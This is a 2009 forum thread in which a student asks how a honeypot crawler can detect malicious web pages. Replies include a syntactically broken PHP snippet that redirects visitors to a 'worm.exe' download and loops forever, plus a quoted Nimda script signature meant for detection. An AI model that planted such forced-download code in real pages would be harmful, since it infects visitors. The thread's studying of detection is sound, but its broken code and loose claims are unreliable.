[naseem.fci]

I want a help
my question is "how can an intrusion detection
system (IDS) analyse the web pages in order to iedtify
malicious ones"?

I know that the system can moniter the changes on
on the registry, file system,........etc. But I
ask about the second way in which the system know
the content of the page.

In other words
"what are the features or properties of malicious
web pages"?
"Is It necessary to know all features of all computer worms, viruses, trojan horses,......etc ? If so, I want a help in how can i indicate the features of each".

Thanks you.

[BlakeJustBlake]

Sounds like someone's homework.

[no2pencil]

naseem.fci, on 3 May, 2009 - 03:23 PM, said:

my question is "how can an intrusion detection
system (IDS) analyse the web pages in order to iedtify
malicious ones"?

An IDS detects intrusions, hense the name. It doesn't look at websites.

BlakeJustBlake, on 3 May, 2009 - 04:17 PM, said:

Sounds like someone's homework.

That explains why it was posted in *Student Campus*

I'll move it to Networking.

[naseem.fci]

It seems that you don't understand me!

I will explain:

I'm a student in the faculty of computer and information sciences, we are asked to do team work projects; I'm a member in the group of the "honey net" project; we have a source code that simulate a honeypot which visits an initial specified web page, checks it, then
collects the links inside it in order to visit each one next and reapeat this for every page.

The honey pot runs each visited page and moniters the changes in memory and cpu recources; it also checks for file system changes. It put limits for consuming each recourse, if these limits are exceeded it decides that the visited page is malicious.

The future work that we want to achieve is to make the honeyput analyse the web page and examine its content in order to know if it contains a computer worm, virus, trojan horse,.........etc.

I was asked to do a search to know specific features of the pages that contain harmful content.

I searched about that, but I found that most information talks about the harmful effects of those malicious contents; I can't extract the specific features or properties of the malicious contents, so ,I don't know how the honeypot can detect these pages.

I don't want you to do my work; but I asked for ideas or starting points after which I can continue in a right way.

thanks.

[numeric]

Pretty much anything on a web page can contain harmful content - links, images even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring whats being sent to and from your test computer and through which ports in addition to the features that you already mentioned.

I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.

-n

[DingleNutZ]

php pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:

<?php

//automated download
header ( Location:"www.page.com/worm.exe");


//extensive CPU usage
do{i+1)while(true);


?>

javascript is could also easily be used to write malicious code.

so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isnt how it would pic it up

[naseem.fci]

numeric, on 7 May, 2009 - 03:24 PM, said:

Pretty much anything on a web page can contain harmful content - links, images even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring whats being sent to and from your test computer and through which ports in addition to the features that you already mentioned.

I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.

-n

so sorry for being late in reply.
I was in exams.
Thanks very much for your offer.
I will send you an e-mail.

DingleNutZ, on 4 Jun, 2009 - 04:56 PM, said:

php pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:

<?php

//automated download
header ( Location:"www.page.com/worm.exe");


//extensive CPU usage
do{i+1)while(true);


?>

javascript is could also easily be used to write malicious code.

so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isnt how it would pic it up

Thanks very much.
we have some progress in our project.
I will explain in the next reply.

[naseem.fci]

we arrive to a specific piont in our project

each internet worm or virus have its own signature. we decided to search for theses signatures and used it as a critria that distinguish a malicious page from others.

we already now have some signatures such as

*the signature of Nimda worm:-

<script language="Javascript">
windows.open("readme.eml",null,"resizable=no, top=6000, left=6000")
</script>

my qustion here is: can we pass this signature to a method in our code and then the system can check to find this text in the web-page, or we must use a regular expression for each signature?

sorry for nuisance.

[naseem.fci]

sorry numeric it seems that i did understand falsy what your blog means!

please tell me how i can send you an e-mail.